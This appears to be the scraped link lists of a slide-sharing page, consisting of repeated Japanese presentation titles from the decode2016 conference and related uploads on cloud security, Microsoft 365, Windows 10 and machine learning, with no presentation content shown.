”もと”中の人が語り尽くすSoftLayerセキュリティー(2016/10/13更新版)”もと”中の人が語り尽くすSoftLayerセキュリティー(2016/10/13更新版)
”もと”中の人が語り尽くすSoftLayerセキュリティー(2016/10/13更新版)Shinobu Yasuda
 
20180224 azure securitycenter
20180224 azure securitycenter20180224 azure securitycenter
20180224 azure securitycenterMasakazu Kishima
 
Monacaエンタープライズのご紹介
Monacaエンタープライズのご紹介Monacaエンタープライズのご紹介
Monacaエンタープライズのご紹介アシアル株式会社
 
【Interop tokyo 2014】 ビッグデータを活用し、被害を予見! シスコの新たなセキュリティ運用モデル
【Interop tokyo 2014】 ビッグデータを活用し、被害を予見! シスコの新たなセキュリティ運用モデル【Interop tokyo 2014】 ビッグデータを活用し、被害を予見! シスコの新たなセキュリティ運用モデル
【Interop tokyo 2014】 ビッグデータを活用し、被害を予見! シスコの新たなセキュリティ運用モデルシスコシステムズ合同会社
 
パネルディスカッション
パネルディスカッションパネルディスカッション
パネルディスカッションNetAgent Co.,Ltd.
 
正しく恐れるクラウドのセキュリティ
正しく恐れるクラウドのセキュリティ正しく恐れるクラウドのセキュリティ
正しく恐れるクラウドのセキュリティymmt
 
今から取り組む企業のための脆弱性対応 〜⼤丈夫、みんなよく分かっていないから〜
今から取り組む企業のための脆弱性対応 〜⼤丈夫、みんなよく分かっていないから〜今から取り組む企業のための脆弱性対応 〜⼤丈夫、みんなよく分かっていないから〜
今から取り組む企業のための脆弱性対応 〜⼤丈夫、みんなよく分かっていないから〜Riotaro OKADA
 
ビルトイン・セキュリティのススメ Dev Days 2015 Tokyo - Riotaro OKADA
ビルトイン・セキュリティのススメ Dev Days 2015 Tokyo - Riotaro OKADAビルトイン・セキュリティのススメ Dev Days 2015 Tokyo - Riotaro OKADA
ビルトイン・セキュリティのススメ Dev Days 2015 Tokyo - Riotaro OKADARiotaro OKADA
 
2019 0917 nw-jaws_f-secure3min
2019 0917 nw-jaws_f-secure3min2019 0917 nw-jaws_f-secure3min
2019 0917 nw-jaws_f-secure3minShinichiro Kawano
 
S08_Microsoft 365 E5 Compliance による内部不正対策の実践 [Microsoft Japan Digital Days]
S08_Microsoft 365 E5 Compliance による内部不正対策の実践 [Microsoft Japan Digital Days]S08_Microsoft 365 E5 Compliance による内部不正対策の実践 [Microsoft Japan Digital Days]
S08_Microsoft 365 E5 Compliance による内部不正対策の実践 [Microsoft Japan Digital Days]日本マイクロソフト株式会社
 
Androidとセキュリティ ~ユーザーを脅威から守る~
Androidとセキュリティ ~ユーザーを脅威から守る~Androidとセキュリティ ~ユーザーを脅威から守る~
Androidとセキュリティ ~ユーザーを脅威から守る~Naoya Niwa
 
お客様からのセキュリティチェックを乗り越えるための SaaS のアプローチ.pptx
お客様からのセキュリティチェックを乗り越えるための SaaS のアプローチ.pptxお客様からのセキュリティチェックを乗り越えるための SaaS のアプローチ.pptx
お客様からのセキュリティチェックを乗り越えるための SaaS のアプローチ.pptxmkoda
 
2020 0611 koan_webinar_f-secure
2020 0611 koan_webinar_f-secure2020 0611 koan_webinar_f-secure
2020 0611 koan_webinar_f-secureShinichiro Kawano
 
S07_経営層 / IT 部門が意識すべきコンプライアンス対応 - Microsoft 365 E5 Compliance で実現するリスク対策 - [...
S07_経営層 / IT 部門が意識すべきコンプライアンス対応 - Microsoft 365 E5 Compliance で実現するリスク対策 - [...S07_経営層 / IT 部門が意識すべきコンプライアンス対応 - Microsoft 365 E5 Compliance で実現するリスク対策 - [...
S07_経営層 / IT 部門が意識すべきコンプライアンス対応 - Microsoft 365 E5 Compliance で実現するリスク対策 - [...日本マイクロソフト株式会社
 
2019 0223 jawsdays2019_slideshare
2019 0223 jawsdays2019_slideshare2019 0223 jawsdays2019_slideshare
2019 0223 jawsdays2019_slideshareShinichiro Kawano
 
クラウド移行で解決されるセキュリティとリスク 公開用
クラウド移行で解決されるセキュリティとリスク 公開用クラウド移行で解決されるセキュリティとリスク 公開用
クラウド移行で解決されるセキュリティとリスク 公開用Lumin Hacker
 

Similar to ARC-006_サイバー セキュリティ、IT Pro、開発、経営 それぞれの視点 (20)

MSC 2010 T2-1 クラウドで企業の PC 運用管理が変わる! Windows Intune (基本編)
MSC 2010 T2-1 クラウドで企業の PC 運用管理が変わる! Windows Intune (基本編)MSC 2010 T2-1 クラウドで企業の PC 運用管理が変わる! Windows Intune (基本編)
MSC 2010 T2-1 クラウドで企業の PC 運用管理が変わる! Windows Intune (基本編)
 
JPC2017 [D4] Microsoft 365 が実現するデジタル時代のセキュリティ
JPC2017 [D4] Microsoft 365 が実現するデジタル時代のセキュリティJPC2017 [D4] Microsoft 365 が実現するデジタル時代のセキュリティ
JPC2017 [D4] Microsoft 365 が実現するデジタル時代のセキュリティ
 
A16_VB でクラサバシステムの開発をしていた平凡なチームが、どのようにクラウドネイティブプロダクト開発にシフトしアジャイル開発を進めることができたのか...
A16_VB でクラサバシステムの開発をしていた平凡なチームが、どのようにクラウドネイティブプロダクト開発にシフトしアジャイル開発を進めることができたのか...A16_VB でクラサバシステムの開発をしていた平凡なチームが、どのようにクラウドネイティブプロダクト開発にシフトしアジャイル開発を進めることができたのか...
A16_VB でクラサバシステムの開発をしていた平凡なチームが、どのようにクラウドネイティブプロダクト開発にシフトしアジャイル開発を進めることができたのか...
 
”もと”中の人が語り尽くすSoftLayerセキュリティー(2016/10/13更新版)
”もと”中の人が語り尽くすSoftLayerセキュリティー(2016/10/13更新版)”もと”中の人が語り尽くすSoftLayerセキュリティー(2016/10/13更新版)
”もと”中の人が語り尽くすSoftLayerセキュリティー(2016/10/13更新版)
 
20180224 azure securitycenter
20180224 azure securitycenter20180224 azure securitycenter
20180224 azure securitycenter
 
Monacaエンタープライズのご紹介
Monacaエンタープライズのご紹介Monacaエンタープライズのご紹介
Monacaエンタープライズのご紹介
 
【Interop tokyo 2014】 ビッグデータを活用し、被害を予見! シスコの新たなセキュリティ運用モデル
【Interop tokyo 2014】 ビッグデータを活用し、被害を予見! シスコの新たなセキュリティ運用モデル【Interop tokyo 2014】 ビッグデータを活用し、被害を予見! シスコの新たなセキュリティ運用モデル
【Interop tokyo 2014】 ビッグデータを活用し、被害を予見! シスコの新たなセキュリティ運用モデル
 
パネルディスカッション
パネルディスカッションパネルディスカッション
パネルディスカッション
 
正しく恐れるクラウドのセキュリティ
正しく恐れるクラウドのセキュリティ正しく恐れるクラウドのセキュリティ
正しく恐れるクラウドのセキュリティ
 
【スカイアーチ】Webサイトを脆弱性攻撃から守る
【スカイアーチ】Webサイトを脆弱性攻撃から守る【スカイアーチ】Webサイトを脆弱性攻撃から守る
【スカイアーチ】Webサイトを脆弱性攻撃から守る
 
今から取り組む企業のための脆弱性対応 〜⼤丈夫、みんなよく分かっていないから〜
今から取り組む企業のための脆弱性対応 〜⼤丈夫、みんなよく分かっていないから〜今から取り組む企業のための脆弱性対応 〜⼤丈夫、みんなよく分かっていないから〜
今から取り組む企業のための脆弱性対応 〜⼤丈夫、みんなよく分かっていないから〜
 
ビルトイン・セキュリティのススメ Dev Days 2015 Tokyo - Riotaro OKADA
ビルトイン・セキュリティのススメ Dev Days 2015 Tokyo - Riotaro OKADAビルトイン・セキュリティのススメ Dev Days 2015 Tokyo - Riotaro OKADA
ビルトイン・セキュリティのススメ Dev Days 2015 Tokyo - Riotaro OKADA
 
2019 0917 nw-jaws_f-secure3min
2019 0917 nw-jaws_f-secure3min2019 0917 nw-jaws_f-secure3min
2019 0917 nw-jaws_f-secure3min
 
S08_Microsoft 365 E5 Compliance による内部不正対策の実践 [Microsoft Japan Digital Days]
S08_Microsoft 365 E5 Compliance による内部不正対策の実践 [Microsoft Japan Digital Days]S08_Microsoft 365 E5 Compliance による内部不正対策の実践 [Microsoft Japan Digital Days]
S08_Microsoft 365 E5 Compliance による内部不正対策の実践 [Microsoft Japan Digital Days]
 
Androidとセキュリティ ~ユーザーを脅威から守る~
Androidとセキュリティ ~ユーザーを脅威から守る~Androidとセキュリティ ~ユーザーを脅威から守る~
Androidとセキュリティ ~ユーザーを脅威から守る~
 
お客様からのセキュリティチェックを乗り越えるための SaaS のアプローチ.pptx
お客様からのセキュリティチェックを乗り越えるための SaaS のアプローチ.pptxお客様からのセキュリティチェックを乗り越えるための SaaS のアプローチ.pptx
お客様からのセキュリティチェックを乗り越えるための SaaS のアプローチ.pptx
 
2020 0611 koan_webinar_f-secure
2020 0611 koan_webinar_f-secure2020 0611 koan_webinar_f-secure
2020 0611 koan_webinar_f-secure
 
S07_経営層 / IT 部門が意識すべきコンプライアンス対応 - Microsoft 365 E5 Compliance で実現するリスク対策 - [...
S07_経営層 / IT 部門が意識すべきコンプライアンス対応 - Microsoft 365 E5 Compliance で実現するリスク対策 - [...S07_経営層 / IT 部門が意識すべきコンプライアンス対応 - Microsoft 365 E5 Compliance で実現するリスク対策 - [...
S07_経営層 / IT 部門が意識すべきコンプライアンス対応 - Microsoft 365 E5 Compliance で実現するリスク対策 - [...
 
2019 0223 jawsdays2019_slideshare
2019 0223 jawsdays2019_slideshare2019 0223 jawsdays2019_slideshare
2019 0223 jawsdays2019_slideshare
 
クラウド移行で解決されるセキュリティとリスク 公開用
クラウド移行で解決されるセキュリティとリスク 公開用クラウド移行で解決されるセキュリティとリスク 公開用
クラウド移行で解決されるセキュリティとリスク 公開用
 

More from decode2016

SPL-005_オープンソースから見たマイクロソフト
SPL-005_オープンソースから見たマイクロソフトSPL-005_オープンソースから見たマイクロソフト
SPL-005_オープンソースから見たマイクロソフトdecode2016
 
SPL-004_Windows 10 開発の舞台裏から学ぶエンジニアの未来
SPL-004_Windows 10 開発の舞台裏から学ぶエンジニアの未来SPL-004_Windows 10 開発の舞台裏から学ぶエンジニアの未来
SPL-004_Windows 10 開発の舞台裏から学ぶエンジニアの未来decode2016
 
SPL-003_黒船襲来! 世界DevOps トップ企業 x マイクロソフトによるトークバトル セッション
SPL-003_黒船襲来! 世界DevOps トップ企業 x マイクロソフトによるトークバトル セッションSPL-003_黒船襲来! 世界DevOps トップ企業 x マイクロソフトによるトークバトル セッション
SPL-003_黒船襲来! 世界DevOps トップ企業 x マイクロソフトによるトークバトル セッションdecode2016
 
SPL-002_クラウド心配性な上司を説得するコツを伝授します ~本当に信頼できるクラウドの構築/運用とは? マイクロソフト クラウド成長の軌跡~
SPL-002_クラウド心配性な上司を説得するコツを伝授します ~本当に信頼できるクラウドの構築/運用とは? マイクロソフト クラウド成長の軌跡~SPL-002_クラウド心配性な上司を説得するコツを伝授します ~本当に信頼できるクラウドの構築/運用とは? マイクロソフト クラウド成長の軌跡~
SPL-002_クラウド心配性な上司を説得するコツを伝授します ~本当に信頼できるクラウドの構築/運用とは? マイクロソフト クラウド成長の軌跡~decode2016
 
PRD-009_クラウドの ERP による業務システム開発 ~OData エンド ポイントから Power BI 連携~
PRD-009_クラウドの ERP による業務システム開発 ~OData エンド ポイントから Power BI 連携~PRD-009_クラウドの ERP による業務システム開発 ~OData エンド ポイントから Power BI 連携~
PRD-009_クラウドの ERP による業務システム開発 ~OData エンド ポイントから Power BI 連携~decode2016
 
PRD-008_クラウド ネイティブ ERP ~Dynamics AX のアーキテクチャ/環境構築から開発/運用まで~
PRD-008_クラウド ネイティブ ERP ~Dynamics AX のアーキテクチャ/環境構築から開発/運用まで~PRD-008_クラウド ネイティブ ERP ~Dynamics AX のアーキテクチャ/環境構築から開発/運用まで~
PRD-008_クラウド ネイティブ ERP ~Dynamics AX のアーキテクチャ/環境構築から開発/運用まで~decode2016
 
PRD-006_機械学習で顧客対応はこう変わる! Azure ML と Dynamics で造る次世代 CRM
PRD-006_機械学習で顧客対応はこう変わる! Azure ML と Dynamics で造る次世代 CRMPRD-006_機械学習で顧客対応はこう変わる! Azure ML と Dynamics で造る次世代 CRM
PRD-006_機械学習で顧客対応はこう変わる! Azure ML と Dynamics で造る次世代 CRMdecode2016
 
PRD-005_Skype Developer Platform によるアプリケーション開発の最新情報
PRD-005_Skype Developer Platform によるアプリケーション開発の最新情報PRD-005_Skype Developer Platform によるアプリケーション開発の最新情報
PRD-005_Skype Developer Platform によるアプリケーション開発の最新情報decode2016
 
PRD-004_ここまでできる! Azure AD と Office 365 連携開発の先進手法
PRD-004_ここまでできる! Azure AD と Office 365 連携開発の先進手法PRD-004_ここまでできる! Azure AD と Office 365 連携開発の先進手法
PRD-004_ここまでできる! Azure AD と Office 365 連携開発の先進手法decode2016
 
PRD-002_SharePoint Server 2016 & Online ハイブリッド環境での業務活用
PRD-002_SharePoint Server 2016 & Online ハイブリッド環境での業務活用PRD-002_SharePoint Server 2016 & Online ハイブリッド環境での業務活用
PRD-002_SharePoint Server 2016 & Online ハイブリッド環境での業務活用decode2016
 
INF-028_そのエラーやお困りごと、ツールを使えば解決できるかも! ~Sysinternals や OS 標準ツールの徹底活用術~
INF-028_そのエラーやお困りごと、ツールを使えば解決できるかも! ~Sysinternals や OS 標準ツールの徹底活用術~INF-028_そのエラーやお困りごと、ツールを使えば解決できるかも! ~Sysinternals や OS 標準ツールの徹底活用術~
INF-028_そのエラーやお困りごと、ツールを使えば解決できるかも! ~Sysinternals や OS 標準ツールの徹底活用術~decode2016
 
INF-027_セキュリティ マニアックス -サイバー攻撃の手口と防御手法- ~敵を知り、己を知れば百戦危うからず~
INF-027_セキュリティ マニアックス -サイバー攻撃の手口と防御手法- ~敵を知り、己を知れば百戦危うからず~INF-027_セキュリティ マニアックス -サイバー攻撃の手口と防御手法- ~敵を知り、己を知れば百戦危うからず~
INF-027_セキュリティ マニアックス -サイバー攻撃の手口と防御手法- ~敵を知り、己を知れば百戦危うからず~decode2016
 
INF-026_真のクラウドベース EMM ~マイクロソフトのモビリティ戦略はいかにユニークか~
INF-026_真のクラウドベース EMM ~マイクロソフトのモビリティ戦略はいかにユニークか~INF-026_真のクラウドベース EMM ~マイクロソフトのモビリティ戦略はいかにユニークか~
INF-026_真のクラウドベース EMM ~マイクロソフトのモビリティ戦略はいかにユニークか~decode2016
 
INF-025_企業で使える Windows 10 ~現実的なアプリ & デバイス管理~
INF-025_企業で使える Windows 10 ~現実的なアプリ & デバイス管理~INF-025_企業で使える Windows 10 ~現実的なアプリ & デバイス管理~
INF-025_企業で使える Windows 10 ~現実的なアプリ & デバイス管理~decode2016
 
INF-024_Windows 10 の展開 ~プロビジョニング? いやワイプ & ロードでしょ!~
INF-024_Windows 10 の展開 ~プロビジョニング? いやワイプ & ロードでしょ!~INF-024_Windows 10 の展開 ~プロビジョニング? いやワイプ & ロードでしょ!~
INF-024_Windows 10 の展開 ~プロビジョニング? いやワイプ & ロードでしょ!~decode2016
 
INF-023_マイクロソフトの特権管理ソリューションの全貌 ~永続的な管理者特権の廃止への道~
INF-023_マイクロソフトの特権管理ソリューションの全貌 ~永続的な管理者特権の廃止への道~INF-023_マイクロソフトの特権管理ソリューションの全貌 ~永続的な管理者特権の廃止への道~
INF-023_マイクロソフトの特権管理ソリューションの全貌 ~永続的な管理者特権の廃止への道~decode2016
 
INF-021_実践! Windows as a Service との上手な付き合い方 ~新しい OS 更新管理の徹底解説~
INF-021_実践! Windows as a Service との上手な付き合い方 ~新しい OS 更新管理の徹底解説~INF-021_実践! Windows as a Service との上手な付き合い方 ~新しい OS 更新管理の徹底解説~
INF-021_実践! Windows as a Service との上手な付き合い方 ~新しい OS 更新管理の徹底解説~decode2016
 
INF-020_メーカーがおしえてくれない正しいクラウドについて
INF-020_メーカーがおしえてくれない正しいクラウドについてINF-020_メーカーがおしえてくれない正しいクラウドについて
INF-020_メーカーがおしえてくれない正しいクラウドについてdecode2016
 
INF-019_Nano Server だけでここまでできる! ~極小サーバーの使い方~
INF-019_Nano Server だけでここまでできる! ~極小サーバーの使い方~INF-019_Nano Server だけでここまでできる! ~極小サーバーの使い方~
INF-019_Nano Server だけでここまでできる! ~極小サーバーの使い方~decode2016
 
INF-018_OS の中で SDN 抗争勃発!? ~主役を争う VXLAN vs NVGRE~
INF-018_OS の中で SDN 抗争勃発!? ~主役を争う VXLAN vs NVGRE~INF-018_OS の中で SDN 抗争勃発!? ~主役を争う VXLAN vs NVGRE~
INF-018_OS の中で SDN 抗争勃発!? ~主役を争う VXLAN vs NVGRE~decode2016
 

More from decode2016 (20)

SPL-005_オープンソースから見たマイクロソフト
SPL-005_オープンソースから見たマイクロソフトSPL-005_オープンソースから見たマイクロソフト
SPL-005_オープンソースから見たマイクロソフト
 
SPL-004_Windows 10 開発の舞台裏から学ぶエンジニアの未来
SPL-004_Windows 10 開発の舞台裏から学ぶエンジニアの未来SPL-004_Windows 10 開発の舞台裏から学ぶエンジニアの未来
SPL-004_Windows 10 開発の舞台裏から学ぶエンジニアの未来
 
SPL-003_黒船襲来! 世界DevOps トップ企業 x マイクロソフトによるトークバトル セッション
SPL-003_黒船襲来! 世界DevOps トップ企業 x マイクロソフトによるトークバトル セッションSPL-003_黒船襲来! 世界DevOps トップ企業 x マイクロソフトによるトークバトル セッション
SPL-003_黒船襲来! 世界DevOps トップ企業 x マイクロソフトによるトークバトル セッション
 
SPL-002_クラウド心配性な上司を説得するコツを伝授します ~本当に信頼できるクラウドの構築/運用とは? マイクロソフト クラウド成長の軌跡~
SPL-002_クラウド心配性な上司を説得するコツを伝授します ~本当に信頼できるクラウドの構築/運用とは? マイクロソフト クラウド成長の軌跡~SPL-002_クラウド心配性な上司を説得するコツを伝授します ~本当に信頼できるクラウドの構築/運用とは? マイクロソフト クラウド成長の軌跡~
SPL-002_クラウド心配性な上司を説得するコツを伝授します ~本当に信頼できるクラウドの構築/運用とは? マイクロソフト クラウド成長の軌跡~
 
PRD-009_クラウドの ERP による業務システム開発 ~OData エンド ポイントから Power BI 連携~
PRD-009_クラウドの ERP による業務システム開発 ~OData エンド ポイントから Power BI 連携~PRD-009_クラウドの ERP による業務システム開発 ~OData エンド ポイントから Power BI 連携~
PRD-009_クラウドの ERP による業務システム開発 ~OData エンド ポイントから Power BI 連携~
 
PRD-008_クラウド ネイティブ ERP ~Dynamics AX のアーキテクチャ/環境構築から開発/運用まで~
PRD-008_クラウド ネイティブ ERP ~Dynamics AX のアーキテクチャ/環境構築から開発/運用まで~PRD-008_クラウド ネイティブ ERP ~Dynamics AX のアーキテクチャ/環境構築から開発/運用まで~
PRD-008_クラウド ネイティブ ERP ~Dynamics AX のアーキテクチャ/環境構築から開発/運用まで~
 
PRD-006_機械学習で顧客対応はこう変わる! Azure ML と Dynamics で造る次世代 CRM
PRD-006_機械学習で顧客対応はこう変わる! Azure ML と Dynamics で造る次世代 CRMPRD-006_機械学習で顧客対応はこう変わる! Azure ML と Dynamics で造る次世代 CRM
PRD-006_機械学習で顧客対応はこう変わる! Azure ML と Dynamics で造る次世代 CRM
 
PRD-005_Skype Developer Platform によるアプリケーション開発の最新情報
PRD-005_Skype Developer Platform によるアプリケーション開発の最新情報PRD-005_Skype Developer Platform によるアプリケーション開発の最新情報
PRD-005_Skype Developer Platform によるアプリケーション開発の最新情報
 
PRD-004_ここまでできる! Azure AD と Office 365 連携開発の先進手法
PRD-004_ここまでできる! Azure AD と Office 365 連携開発の先進手法PRD-004_ここまでできる! Azure AD と Office 365 連携開発の先進手法
PRD-004_ここまでできる! Azure AD と Office 365 連携開発の先進手法
 
PRD-002_SharePoint Server 2016 & Online ハイブリッド環境での業務活用
PRD-002_SharePoint Server 2016 & Online ハイブリッド環境での業務活用PRD-002_SharePoint Server 2016 & Online ハイブリッド環境での業務活用
PRD-002_SharePoint Server 2016 & Online ハイブリッド環境での業務活用
 
INF-028_そのエラーやお困りごと、ツールを使えば解決できるかも! ~Sysinternals や OS 標準ツールの徹底活用術~
INF-028_そのエラーやお困りごと、ツールを使えば解決できるかも! ~Sysinternals や OS 標準ツールの徹底活用術~INF-028_そのエラーやお困りごと、ツールを使えば解決できるかも! ~Sysinternals や OS 標準ツールの徹底活用術~
INF-028_そのエラーやお困りごと、ツールを使えば解決できるかも! ~Sysinternals や OS 標準ツールの徹底活用術~
 
INF-027_セキュリティ マニアックス -サイバー攻撃の手口と防御手法- ~敵を知り、己を知れば百戦危うからず~
INF-027_セキュリティ マニアックス -サイバー攻撃の手口と防御手法- ~敵を知り、己を知れば百戦危うからず~INF-027_セキュリティ マニアックス -サイバー攻撃の手口と防御手法- ~敵を知り、己を知れば百戦危うからず~
INF-027_セキュリティ マニアックス -サイバー攻撃の手口と防御手法- ~敵を知り、己を知れば百戦危うからず~
 
INF-026_真のクラウドベース EMM ~マイクロソフトのモビリティ戦略はいかにユニークか~
INF-026_真のクラウドベース EMM ~マイクロソフトのモビリティ戦略はいかにユニークか~INF-026_真のクラウドベース EMM ~マイクロソフトのモビリティ戦略はいかにユニークか~
INF-026_真のクラウドベース EMM ~マイクロソフトのモビリティ戦略はいかにユニークか~
 
INF-025_企業で使える Windows 10 ~現実的なアプリ & デバイス管理~
INF-025_企業で使える Windows 10 ~現実的なアプリ & デバイス管理~INF-025_企業で使える Windows 10 ~現実的なアプリ & デバイス管理~
INF-025_企業で使える Windows 10 ~現実的なアプリ & デバイス管理~
 
INF-024_Windows 10 の展開 ~プロビジョニング? いやワイプ & ロードでしょ!~
INF-024_Windows 10 の展開 ~プロビジョニング? いやワイプ & ロードでしょ!~INF-024_Windows 10 の展開 ~プロビジョニング? いやワイプ & ロードでしょ!~
INF-024_Windows 10 の展開 ~プロビジョニング? いやワイプ & ロードでしょ!~
 
INF-023_マイクロソフトの特権管理ソリューションの全貌 ~永続的な管理者特権の廃止への道~
INF-023_マイクロソフトの特権管理ソリューションの全貌 ~永続的な管理者特権の廃止への道~INF-023_マイクロソフトの特権管理ソリューションの全貌 ~永続的な管理者特権の廃止への道~
INF-023_マイクロソフトの特権管理ソリューションの全貌 ~永続的な管理者特権の廃止への道~
 
INF-021_実践! Windows as a Service との上手な付き合い方 ~新しい OS 更新管理の徹底解説~
INF-021_実践! Windows as a Service との上手な付き合い方 ~新しい OS 更新管理の徹底解説~INF-021_実践! Windows as a Service との上手な付き合い方 ~新しい OS 更新管理の徹底解説~
INF-021_実践! Windows as a Service との上手な付き合い方 ~新しい OS 更新管理の徹底解説~
 
INF-020_メーカーがおしえてくれない正しいクラウドについて
INF-020_メーカーがおしえてくれない正しいクラウドについてINF-020_メーカーがおしえてくれない正しいクラウドについて
INF-020_メーカーがおしえてくれない正しいクラウドについて
 
INF-019_Nano Server だけでここまでできる! ~極小サーバーの使い方~
INF-019_Nano Server だけでここまでできる! ~極小サーバーの使い方~INF-019_Nano Server だけでここまでできる! ~極小サーバーの使い方~
INF-019_Nano Server だけでここまでできる! ~極小サーバーの使い方~
 
INF-018_OS の中で SDN 抗争勃発!? ~主役を争う VXLAN vs NVGRE~
INF-018_OS の中で SDN 抗争勃発!? ~主役を争う VXLAN vs NVGRE~INF-018_OS の中で SDN 抗争勃発!? ~主役を争う VXLAN vs NVGRE~
INF-018_OS の中で SDN 抗争勃発!? ~主役を争う VXLAN vs NVGRE~
 

Recently uploaded

論文紹介:Content-Aware Token Sharing for Efficient Semantic Segmentation With Vis...
論文紹介:Content-Aware Token Sharing for Efficient Semantic Segmentation With Vis...論文紹介:Content-Aware Token Sharing for Efficient Semantic Segmentation With Vis...
論文紹介:Content-Aware Token Sharing for Efficient Semantic Segmentation With Vis...Toru Tamaki
 
SOPを理解する 2024/04/19 の勉強会で発表されたものです
SOPを理解する 2024/04/19 の勉強会で発表されたものですSOPを理解する 2024/04/19 の勉強会で発表されたものです
SOPを理解する 2024/04/19 の勉強会で発表されたものですiPride Co., Ltd.
 
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...博三 太田
 
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?akihisamiyanaga1
 
Open Source UN-Conference 2024 Kawagoe - 独自OS「DaisyOS GB」の紹介
Open Source UN-Conference 2024 Kawagoe - 独自OS「DaisyOS GB」の紹介Open Source UN-Conference 2024 Kawagoe - 独自OS「DaisyOS GB」の紹介
Open Source UN-Conference 2024 Kawagoe - 独自OS「DaisyOS GB」の紹介Yuma Ohgami
 
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdf
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdfクラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdf
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdfFumieNakayama
 
論文紹介:Automated Classification of Model Errors on ImageNet
論文紹介:Automated Classification of Model Errors on ImageNet論文紹介:Automated Classification of Model Errors on ImageNet
論文紹介:Automated Classification of Model Errors on ImageNetToru Tamaki
 
TSAL operation mechanism and circuit diagram.pdf
TSAL operation mechanism and circuit diagram.pdfTSAL operation mechanism and circuit diagram.pdf
TSAL operation mechanism and circuit diagram.pdftaisei2219
 
TataPixel: 畳の異方性を利用した切り替え可能なディスプレイの提案
TataPixel: 畳の異方性を利用した切り替え可能なディスプレイの提案TataPixel: 畳の異方性を利用した切り替え可能なディスプレイの提案
TataPixel: 畳の異方性を利用した切り替え可能なディスプレイの提案sugiuralab
 
論文紹介:Semantic segmentation using Vision Transformers: A survey
論文紹介:Semantic segmentation using Vision Transformers: A survey論文紹介:Semantic segmentation using Vision Transformers: A survey
論文紹介:Semantic segmentation using Vision Transformers: A surveyToru Tamaki
 
【早稲田AI研究会 講義資料】3DスキャンとTextTo3Dのツールを知ろう!(Vol.1)
【早稲田AI研究会 講義資料】3DスキャンとTextTo3Dのツールを知ろう!(Vol.1)【早稲田AI研究会 講義資料】3DスキャンとTextTo3Dのツールを知ろう!(Vol.1)
【早稲田AI研究会 講義資料】3DスキャンとTextTo3Dのツールを知ろう!(Vol.1)Hiroki Ichikura
 
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineerYuki Kikuchi
 
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdf
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdfAWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdf
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdfFumieNakayama
 
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)UEHARA, Tetsutaro
 

Recently uploaded (14)

論文紹介:Content-Aware Token Sharing for Efficient Semantic Segmentation With Vis...
論文紹介:Content-Aware Token Sharing for Efficient Semantic Segmentation With Vis...論文紹介:Content-Aware Token Sharing for Efficient Semantic Segmentation With Vis...
論文紹介:Content-Aware Token Sharing for Efficient Semantic Segmentation With Vis...
 
SOPを理解する 2024/04/19 の勉強会で発表されたものです
SOPを理解する 2024/04/19 の勉強会で発表されたものですSOPを理解する 2024/04/19 の勉強会で発表されたものです
SOPを理解する 2024/04/19 の勉強会で発表されたものです
 
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...
 
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?
 
Open Source UN-Conference 2024 Kawagoe - 独自OS「DaisyOS GB」の紹介
Open Source UN-Conference 2024 Kawagoe - 独自OS「DaisyOS GB」の紹介Open Source UN-Conference 2024 Kawagoe - 独自OS「DaisyOS GB」の紹介
Open Source UN-Conference 2024 Kawagoe - 独自OS「DaisyOS GB」の紹介
 
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdf
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdfクラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdf
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdf
 
論文紹介:Automated Classification of Model Errors on ImageNet
論文紹介:Automated Classification of Model Errors on ImageNet論文紹介:Automated Classification of Model Errors on ImageNet
論文紹介:Automated Classification of Model Errors on ImageNet
 
TSAL operation mechanism and circuit diagram.pdf
TSAL operation mechanism and circuit diagram.pdfTSAL operation mechanism and circuit diagram.pdf
TSAL operation mechanism and circuit diagram.pdf
 
